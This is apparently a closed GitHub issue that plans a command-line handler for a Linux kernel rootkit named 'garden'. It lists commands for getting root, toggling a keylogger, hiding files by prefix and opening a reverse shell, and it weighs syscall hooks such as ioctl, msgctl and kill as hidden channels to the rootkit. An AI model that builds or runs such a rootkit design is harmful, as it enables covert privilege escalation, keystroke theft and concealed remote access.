Closed alichtman closed 5 years ago
Solution
Write a userspace C program that acts as a handler to interface with the rootkit LKM using ioctl
.
During setup, this binary will need to be compiled and moved to /<ROOTKIT_NAME>
.
$ /garden root
will be the command to get root.
$ /garden keylogger [enable/disable]
will toggle keylogger
$ /garden hide add PREFIX
will add a prefix to the hide list
$ /garden hide rm PREFIX
will remove a prefix from the hide list
$ /garden hide list
will show prefixes in the hide list
$ /garden rev_tcp IP PORT
will open a reverse shell
Need to add color!
Hook a syscall that passes a pointer (for a pointer to the action_task struct), and has one other parameter we can use as a signal to the rootkit that the next call to this function is a command.
Get msgctl
working.
We now need a way to communicate with the rootkit that isn't writing to the param files, as those no longer exist.
A few options are:
$ kill <MAGIC_PID>
$ cat <MAGIC_FILE>
The blocker is figuring out how to hook any of these commands.
ioctl
maybe?